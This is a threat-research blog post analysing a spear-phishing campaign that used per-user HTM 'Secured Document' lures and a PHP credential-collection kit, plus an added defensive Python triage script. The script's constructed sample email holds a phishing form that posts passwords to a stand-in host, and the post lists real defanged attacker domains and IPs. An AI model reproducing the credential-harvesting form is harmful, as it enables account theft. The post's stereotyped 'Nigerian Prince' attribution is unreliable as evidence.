The GoSecure Titan Inbox Detection and Response (IDR) team recently discovered yet another targeted spear-phishing campaign. The campaign targeted over 150 organizations across a wide array of industries, including financial services, automotive, technology, and defense contractors.

The samples use many common Business Email Compromise (BEC) traits: the From header is spoofed to look as though the message originates inside the company, the attachment is presented as a "receipt", and the Subject indicates that a file is being received. The bad actor went further and tried to pass the message off as an automated Microsoft Office 365 notification by placing "Sent Via Microsoft OneDrive" in the body of the message.

Opening the attachment launches the browser and displays a "Secured Document" page that prompts the user to log in to view the file. The page resembles the landing pages of many electronic-signature services.
Here is where it gets interesting. On closer inspection, the targeted user's email address and company name are hardcoded into the HTM attachment. This indicates that each attachment was generated individually for a specific user at a specific organization, rather than sent as a generic lure.

Further analysis showed that the credentials entered would be sent to hxxps://tradershost[.]com/REDACTED/send.php:

Visiting send.php directly in a browser returns the JSON reply {"msg":"empty"}, which indicates that the phishing kit has its own back-end API (the endpoint answers with JSON rather than an HTML page). Removing send.php from the URL returns a directory index listing the other files in the kit. Leaving directory indexing enabled was a novice, or possibly lazy, move that helped the investigation considerably. One of the files listed was named "admin@paperfoxla.com.txt"; it appears to be the "database" file holding all of the usernames and passwords collected so far by this campaign.
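As an added illustration of the traits described above (this is example code written for this page, not GoSecure's tooling and not the kit itself), the following Python script triages a constructed .eml: it checks for the spoofed internal From, the "Sent Via Microsoft OneDrive" body text and the file-received subject, then parses any HTM attachment to pull out the hardcoded target address, the company name and the send.php exfiltration endpoint. The sample message, the domains victim-corp.example and phish-host.example, the company name, the kit path and the form field names are all assumptions.

```python
"""Triage a suspected phishing message carrying an HTM credential-harvesting lure.

Added example (not GoSecure's code). SAMPLE_EML is a constructed message; the
sender, recipient, company, host name and the kit's form layout are assumptions
chosen to mirror the traits described in the article, not data from the campaign.
"""
import email
import json
import re
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: From is spoofed to the victim's own domain, Return-Path
# exposes the real sending host, the body carries the OneDrive lure, and the
# "receipt" is an HTM attachment with the target and exfil endpoint baked in.
SAMPLE_EML = b"""\
Return-Path: <bounce@mailer.example.net>
From: "Accounts Payable" <ap@victim-corp.example>
To: jane.doe@victim-corp.example
Subject: File received: Receipt_4471
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Sent Via Microsoft OneDrive

--b1
Content-Type: text/html; name="Receipt_4471.htm"
Content-Disposition: attachment; filename="Receipt_4471.htm"

<html><body><h2>Secured Document</h2><p>Log in to view the file.</p>
<form method="post" action="https://phish-host.example/kit/send.php">
<input type="hidden" name="company" value="Victim Corp">
<input type="email" name="email" value="jane.doe@victim-corp.example">
<input type="password" name="password">
</form></body></html>
--b1--
"""


def domain(addr: str) -> str:
    """Lower-cased domain part of an address, or '' if there is none."""
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


class FormExtractor(HTMLParser):
    """Collect <form action> targets and <input name=value> pairs."""

    def __init__(self):
        super().__init__()
        self.actions = []
        self.inputs = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "input" and a.get("name"):
            self.inputs[a["name"]] = a.get("value") or ""


def analyze_htm(html: str, recipient: str) -> dict:
    """Pull the hardcoded target and the exfil endpoint(s) out of the lure."""
    p = FormExtractor()
    p.feed(html)
    # Kits may post via a <form> or via script; catch any .php URL either way.
    urls = p.actions + re.findall(r"https?://[^\s\"'<>]+?\.php\b", html)
    exfil = []
    for u in urls:
        host = urlparse(u).netloc
        if host and host != domain(recipient) and u not in exfil:
            exfil.append(u)
    target = p.inputs.get("email", "")
    return {
        "hardcoded_target": target,
        "target_matches_recipient": target.lower() == recipient.lower(),
        "company": p.inputs.get("company", ""),
        "secured_document_lure": "secured document" in html.lower(),
        "exfil_urls": exfil,
    }


def triage(raw: bytes) -> dict:
    """Score the message on the BEC traits the article describes."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    _, sender = parseaddr(str(msg["From"] or ""))
    _, return_path = parseaddr(str(msg["Return-Path"] or ""))
    _, recipient = parseaddr(str(msg["To"] or ""))
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content() if body else ""
    subject = str(msg["Subject"] or "")

    findings = {
        # From claims the victim's own domain while the bounce path goes elsewhere
        "spoofed_internal_sender": domain(sender) == domain(recipient)
        and domain(return_path) != domain(sender),
        "onedrive_lure": "sent via microsoft onedrive" in text.lower(),
        "subject_file_lure": bool(re.search(r"receipt|file received", subject, re.I)),
        "htm_attachments": [],
    }
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith((".htm", ".html")):
            findings["htm_attachments"].append(analyze_htm(part.get_content(), recipient))

    hits = sum(1 for k in ("spoofed_internal_sender", "onedrive_lure", "subject_file_lure") if findings[k])
    hits += sum(1 for a in findings["htm_attachments"] if a["exfil_urls"])
    findings["score"] = hits
    return findings


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_EML), indent=2))
```

Run as a script it prints the findings as JSON. In a mail pipeline the two fields worth acting on are exfil_urls, which gives a block and hunt indicator for the kit's collection endpoint, and target_matches_recipient, which is the per-user generation evidence the article describes: a lure whose hardcoded address equals the recipient was built for that one person.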

GoSecure Titan IDR analysts found that the tradershost[.]com site runs on an Apache server and appears to exist solely for malicious activity. Its content is a PHP web application dressed up to look like a stock-trading company.

Through all our research, one thing in particular stood out. The credential files contained a name claiming credit for the spear phishing:
– by *DH4 VIP3R L337 –
Searching Google for that string revealed multiple websites containing it. One of them, "viperserver11[.]xyz", hosted copies of the same phishing kit; these copies appeared to be the bad actor's own test deployments of the kit.

GoSecure Titan IDR analysts discovered another website, “uswidefiinancial[.]com”, which appeared to be another hosted phishing campaign.

Our investigation identified one possible slip-up by the bad actor. In the actor's own test submissions to the kit, the same IP addresses appeared each time. The first, 45.41.180.81, belonged to a consumer VPN provider. However, a second address was also recorded: 105.161.23.111, which belongs to Safaricom Limited, an ISP in Nairobi, Kenya.

Wrapping up our investigation, we found the bad actor's handle in use as a YouTube channel. Although activity was limited to a single upload from 2016, the video comes from the country we all know when it comes to spam and phishing: Nigeria. Just maybe our Nigerian Prince friend finally ran out of money and changed his occupation.

Using Privacy as a Shield

The bad actor used products and services that are commonly, and legitimately, used to host websites, email, and e-commerce safely, securely, and privately. For example, many hosting companies, including NameCheap, offer a WHOIS privacy service for domains. For most customers, this spares small companies and individuals from a stream of emails and phone calls offering to build them the most amazing website or pushing services they do not need. In the hands of a bad actor, however, it masks exactly the registration details that could help track them down.

All three domains, "viperserver11[.]xyz", "tradershost[.]com", and "uswidefiinancial[.]com", were hidden behind such services, making it harder to gather information. "viperserver11[.]xyz" sat behind Cloudflare, so the IP address of the origin server running the site could not easily be discovered. The other two were registered and hosted with NameCheap, a registrar with a very strict privacy policy.

Final Thought

The organizations targeted by the campaign come in all sizes, including some very well-known Fortune 500 companies and government organizations. It is comforting to believe that their size and cybersecurity budgets protect some of these organizations from such attacks. As this campaign illustrates, cybercriminals continue to find ways past traditional email gateway solutions, leaving imperfect humans as the organization's final line of defense. By the time GoSecure Titan IDR analysts found the primary server behind this attack, the cybercriminals had already collected 211 unique usernames and passwords from 159 different organizations. Imperfect humans indeed.